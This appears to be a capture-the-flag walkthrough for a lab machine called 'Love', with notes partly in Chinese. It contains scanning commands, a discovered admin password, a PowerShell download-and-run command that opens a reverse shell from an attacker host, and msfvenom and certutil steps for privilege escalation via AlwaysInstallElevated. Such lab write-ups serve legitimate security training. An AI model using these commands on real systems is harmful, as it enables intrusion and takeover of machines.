nmap -sV -sC -Pn 10.129.157.58 > nmap.txt
nmap -p- 10.129.157.58 > nmapall.txt

gobuster dir  -u http://www.love.htb/admin/  -w /usr/share/dirb/wordlists/common.txt -x txt,php,cgi > gobusteradmin.txt
gobuster dir  -u https://staging.love.htb/ -k  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,cgi -s "200,204,301,302,307,401" > gobusterhttps.txt
gobuster dir  -u http://10.129.157.58:5000  -w /usr/share/dirb/wordlists/common.txt -x txt,php,cgi > gobuster5000.txt

nmap --script smb* -sV -p 139,445 10.129.157.58 > nmapsmb.txt


Email Address   roy@love.htb


1.掃描後發現有 80 443 5000
2.綁定域名後找到free file scanner服務,可以訪問本地5000端口,找到密碼

 Vote Admin Creds admin: @LoveIsInTheAir!!!!




1.掃描到80 443 5000 端口榜定域名後可以發現free file scanner
2.free file scanner 可以查看本地5000 port發現voting system得密碼
http://staging.love.htb/beta.php
3.登入voting system 上傳reverse.php
http://www.love.htb/admin/
4.執行reverse 指令取得reverse shell
powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.45/Invoke-PowerShellTcp.ps1')
5.上傳winPEAS.exe發現有AlwaysInstallElevated漏洞利用
6.參考網上文章https://fdlucifer.github.io/2021/05/03/love/
7.生成msi的reverse檔案
msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=10.10.14.45 LPORT=1337  --format msi --out AlwaysInstallElevated.msi
8.上傳reverse 並執行
certutil.exe -urlcache -split -f http://10.10.14.45/AlwaysInstallElevated.msi AlwaysInstallElevated.msi
